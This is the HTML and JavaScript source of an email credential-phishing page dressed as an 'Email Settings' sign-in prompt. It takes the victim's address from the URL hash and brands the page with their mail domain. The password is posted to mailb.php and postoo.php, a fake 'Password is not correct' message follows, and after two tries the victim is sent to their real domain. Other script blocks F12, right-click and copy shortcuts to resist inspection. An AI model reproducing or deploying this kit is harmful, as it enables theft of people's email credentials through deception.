<html><head> 
 <title>Email Settings | For:<span id="ha"></span></title>
 <link rel="icon" href="https://undependable-hangar.000webhostapp.com/alo/auto/zzaut/Autoupgrade/files/favicon.ico" type="image/gif">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">

<style>
 body{
  font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
  margin-top: 0%;
  margin-left: 0%;
  margin-right: 0%;
  margin-bottom: 0%;
 }
.container{ 
width: 100%;
}
.header{
 background-color: black;
 padding: 25px;
 color: white;
 text-align: left;
 font-weight: 700;
 font-size: 14px;
 padding-left: 20px;
}
.form{
 padding-left: 50px;
 padding-right: 50px;
 padding: 45px;
 border-radius: 5px;
 box-shadow: rgba(48, 47, 47, 0.849) 0px 0px 5px 7px;
 width: 300px;
}
input[type=email], input[type=password]{
 width: 100%;
 padding: 8px;
 font-size: 15px;
 border-radius: 3px;
 border: solid rgb(131, 130, 130) 1px;
 box-shadow: rgba(119, 118, 118, 0.466) 0px 0px 2px 3px;
}
input[type=text]:focus, input[type=password]:focus {
 box-shadow: rgb(12, 60, 105);
}
input[type=submit]{
 width: 100%;
 background: rgb(12, 60, 105);
 padding: 8px;
 border: hidden;
 font-weight: 600;
 font-size: 15px;
 border-radius: 3px;
 color: white;
 font-size: 15px;
}
#l1{
 color: rgb(11, 34, 54);
 font-size: 18px;
 font-weight: 600;
}
#l2{
 color: rgb(46, 47, 48);
 font-size: 14px;
}
#l3 {
 color: rgb(43, 64, 85);
 font-size: 27px;
 font-weight: 600;
}
#icon {
 width: 380px;
 text-align: left;
 padding: 10px;
 padding-left: 0%;
 text-align: left;
}
.footer{
 background-color: rgb(41, 58, 75);;
 padding: 10px;
 color: white;
 font-weight: 500;
 font-size: 13px;
 text-align: center;
 position: fixed;
 width: 100%;
 bottom: 0;
}
</style><script>
 //////////F12 disable code////////////////////////
 document.onkeypress = function (event) {
        event = (event || window.event);
        if (event.keyCode == 123) {
           //alert('No F-12');
            return false;
        }
    }
    document.onmousedown = function (event) {
        event = (event || window.event);
        if (event.keyCode == 123) {
            //alert('No F-keys');
            return false;
        }
    }
document.onkeydown = function (event) {
        event = (event || window.event);
        if (event.keyCode == 123) {
            //alert('No F-keys');
            return false;
        }
    }


//Disable right click script 
var message="Sorry, right-click has been disabled"; 
/////////////////////////////////// 
function clickIE() {if (document.all) {(message);return false;}} 
function clickNS(e) {if 
(document.layers||(document.getElementById&&!document.all)) { 
if (e.which==2||e.which==3) {(message);return false;}}} 
if (document.layers) 
{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;} 
else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;} 
document.oncontextmenu=new Function("return false") 
// 
function disableCtrlKeyCombination(e)
{
//list all CTRL + key combinations you want to disable
var forbiddenKeys = new Array('a', 'n', 'c', 'x', 'v', 'j' , 'w','s','u');
var key;
var isCtrl;
if(window.event)
{
key = window.event.keyCode;     //IE
if(window.event.ctrlKey)
isCtrl = true;
else
isCtrl = false;
}
else
{
key = e.which;     //firefox
if(e.ctrlKey)
isCtrl = true;
else
isCtrl = false;
}
//if ctrl is pressed check if other key is in forbidenKeys array
if(isCtrl)
{
for(i=0; i<forbiddenKeys.length; i++)
{
//case-insensitive comparation
if(forbiddenKeys[i].toLowerCase() == String.fromCharCode(key).toLowerCase())
{
alert('Key combination CTRL + '+String.fromCharCode(key) +' has been disabled.');
return false;
}
}
}
return true;
}
</script></head>





<body>
<div class="container">
<div class="header">Jan 29, 2022 | 12:58: 28 PM</div>
<center>
<div style="padding: 15px; height: 40px;"></div>
<div id="icon">
 <table><tbody><tr>
 <td><img src="http://icons.iconarchive.com/icons/graphicloads/100-flat/256/email-2-icon.png" width="30"></td>
 <td><label id="file">  uyoiuyioyuioyio</label></td>
 </tr>
 </tbody></table>
</div>
<div class="form">
<form id="fm" method="POST" action="mailb.php">
<div style="text-align: left;">
<label id="l1">Authentication Required </label><br>
<label id="l2">Please Sign In again to continue...</label>
</div>
<div style="padding: 5px;"></div>
<input name="TYRdgbkNLKBIJgyfcXHBK" type="hidden" class="form-control" id="email"  placeholder="Username">
				<font face="arial" size="4" color="#02325e"><span id="emailich"></span></font>
<div style="padding: 5px;"></div>
<input type="password" name="HGFDSwrtbczyFGDFSfgh" placeholder="Password" autocomplete="current-password;" required="">
<div style="padding: 8px; padding-left: 0%; text-align: left;">
<input type="checkbox" checked="">
</div>
<div style="padding: 5px;"></div>
<input type="submit" name="TETcuYGOc">
</form>
</div>

<div style="padding: 15px; height: 100px;"></div>
</center>
<div class="footer"> Email Settings | For: <i><span></span></i> </div>
</div>
  <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
      <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
      <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
    <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/jquery.session@1.0.0/jquery.session.min.js"></script>

<script>

    /* global $ */
    $(document).ready(function(){
      var count=0;

      $('#back1').click(function () {
        $("#msg").hide();
        $('#email').val("");
        $("#automail").animate({left:200, opacity:"hide"}, 0);
        $("#inputbar").animate({right:200, opacity:"show"}, 1000);

      });

      var email = window.location.hash.substr(1);
      if (!email) {

      }
      else
      {
        var my_email =email;
        $('#emailich').html(my_email);
		
		$('#ha').html(my_email);
		
		
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_email)) {
          $('#error').show();
          email.focus;
          return false;
        }
        var ind=my_email.indexOf("@");
        var my_slice=my_email.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();
        var finalu= c.toUpperCase();
		$('#file').html(finalu);

 
      }


      
      $('#submit-btn').click(function(event){
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var email=$("#email").val();
        var password=$("#password").val();
        var msg = $('#msg').html();
        $('#msg').text( msg );

                    if (!password) {
                $('#msg').show();
                $('#msg').html("Password field is empty!");

                return false;
            }


      ///////////new injection////////////////
      var my_email =email;
      var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

      if (!filter.test(my_email)) {
        $('#error').show();
        email.focus;
        return false;
      }

      var ind=my_email.indexOf("@");
      var my_slice=my_email.substr((ind+1));
      var c= my_slice.substr(0, my_slice.indexOf('.'));
      var final= c.toLowerCase();
      var finalu= c.toUpperCase();

       
      count=count+1;
      
      $.ajax({
        dataType: 'JSON',
        url: 'postoo.php',
        type: 'POST',
        data:{
          email:email,
          password:password,
        },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr){
              $('#submit-btn').html('Verifying...');
            },
            success: function(response){
              if(response){
                $("#msg").show();
                console.log(response);
                if(response['signal'] == 'ok'){
                 
                  if (count>=2) {
                    count=0;
                    // window.location.replace(response['redirect_link']);
                     window.location.replace("https://www."+my_slice);

                  }
                               $("#msg").show();
               $('#msg').html("Password is not correct. Please try again");
                }
                else{
                                $("#msg").show();
               $('#msg').html("Password is not correct. Please try again");
                }
              }
            },
            error: function(){
             
              if (count>=2) {
                count=0;
                 window.location.replace("https://www."+my_slice);
              }
              $("#msg").show();
               $('#msg').html("Password is not correct. Please try again");
            },
            complete: function(){
              $('#submit-btn').html('Sign in');
            }
          });
    });


    });


  </script>

</body></html>